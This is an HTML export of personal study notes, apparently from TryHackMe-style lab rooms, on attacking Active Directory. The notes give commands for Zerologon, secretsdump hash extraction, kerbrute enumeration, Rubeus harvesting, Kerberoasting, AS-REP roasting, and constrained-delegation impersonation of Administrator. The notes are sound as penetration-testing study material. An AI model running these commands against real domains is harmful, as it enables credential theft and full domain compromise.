<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>AD Notes</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>AD Notes</h1>

      <div class="ck-content">
        <p> </p>
        <p><code>nmap -n -sV --script "ldap* and not brute" -p 389 10.10.170.157</code> for
          finding NetBIOS name of the Domain Controller,</p>
        <p>NetBIOS domain name of the network, etc.,</p>
        <p><code>python3 zerologon.py &lt;dc-name&gt; &lt;dc-ip&gt;</code>

        </p>
        <p><code>python3 secretsdump.py -just-dc -no-pass DC01\$@10.10.170.157</code> to
          dump ntlm hashes of the system</p>
        <p><code>./kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local User.txt</code>

          <br
          /> for username enumeration</p>
        <p><code>`Rubeus.exe harvest /interval:30`</code>  hash dump when you're already
          in</p>
        <p>for kerberoasting/find users hashes use:</p><pre><code class="language-text-plain">python3 GetUserSPNs.py COOCTUS.CORP/Visitor:GuestLogin! -dc-ip 10.10.15.138 -request</code></pre>

        <p>if you get the error, <code>[-] Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)</code> when
          running this, it's because of your local time, you need to synchronize
          the host with the DC: <code>ntpdate 10.10.15.138</code>

        </p>
        <p>Very similar to Kerberoasting, AS-REP Roasting dumps the krbasrep5 hashes
          of user accounts that have Kerberos pre-authentication disabled.</p><pre><code class="language-text-plain">python3 GetNPUsers.py windcorp.thm/ -no-pass -usersfile ../../../windcorp/valid_users.txt</code></pre>

        <p>Kerberoasting allows a user to request a service ticket for any service
          with a registered SPN then use that ticket to crack the service password.
          If the service has a registered SPN then it can be Kerberoastable however
          the success of the attack depends on how strong the password is and if
          it is trackable as well as the privileges of the cracked service account.</p>
        <p>There are other tools out as well for AS-REP Roasting such as kekeo and
          Impacket's GetNPUsers.py.</p>
        <p><strong>Insert 23$ after $krb5asrep$ so that the first line will be $krb5asrep$23$User.....</strong>

        </p>
        <p><strong>The Local Security Authority Subsystem Service (LSASS) is a memory process that stores credentials on an active directory server and can store Kerberos ticket along with other credential types to act as the gatekeeper and accept or reject the credentials provided. You can dump the Kerberos Tickets from the LSASS memory just like you can dump hashes.</strong>

        </p>
        <figure class="image image_resized" style="width:60.14%">
          <img src="AD%20Notes/c9113ad0ff443dd0973736552e85aa.jpg" />
        </figure>
         <h2>Kerberos Delegation:</h2>

        <p>The following is a description of the risk posed by different delegation
          types:</p>
        <ul>
          <li><strong>Unconstrained delegation</strong>: Any service can be abused if
            one of their delegation entries is sensitive.</li>
          <li><strong>Constrained delegation</strong>: Constrained entities can be abused
            if one of their delegation entries is sensitive.</li>
          <li><strong>Resource-based constrained delegation (RBCD)</strong>: Resource-based
            constrained entities can be abused if the entity itself is sensitive.</li>
        </ul>
        <p><code>'TRUSTED_TO_AUTH_FOR_DELEGATION!'</code> set which confirms our contrained
          delegation theory.</p>
        <p>Using the impacket's find delegation to extract more information about
          the delegation.</p><pre><code class="language-text-plain">impacket-findDelegation -debug COOCTUS.CORP/password-reset:resetpassword -dc-ip 10.10.15.138</code></pre>

        <p>Using the impacket's getST script to impersonate and get the ticket of
          the Administrator user.
          <br />If the account is configured with constrained delegation (with protocol
          transition), we can request service tickets for other users, assuming the
          target SPN is allowed for delegation</p><pre><code class="language-text-plain">impacket-getST -spn oakley/DC.COOCTUS.CORP -impersonate Administrator "COOCTUS.CORP/password-reset:resetpassword" -dc-ip 10.10.15.138</code></pre>

        <p>Once we have the ccache file, set it to the KRB5CCNAME variable so that
          it is loaded inside the memory and then we can use it to our advantage.</p><pre><code class="language-text-plain">export KRB5CCNAME=Administrator.ccache</code></pre>
      </div>
    </div>
  </body>

</html>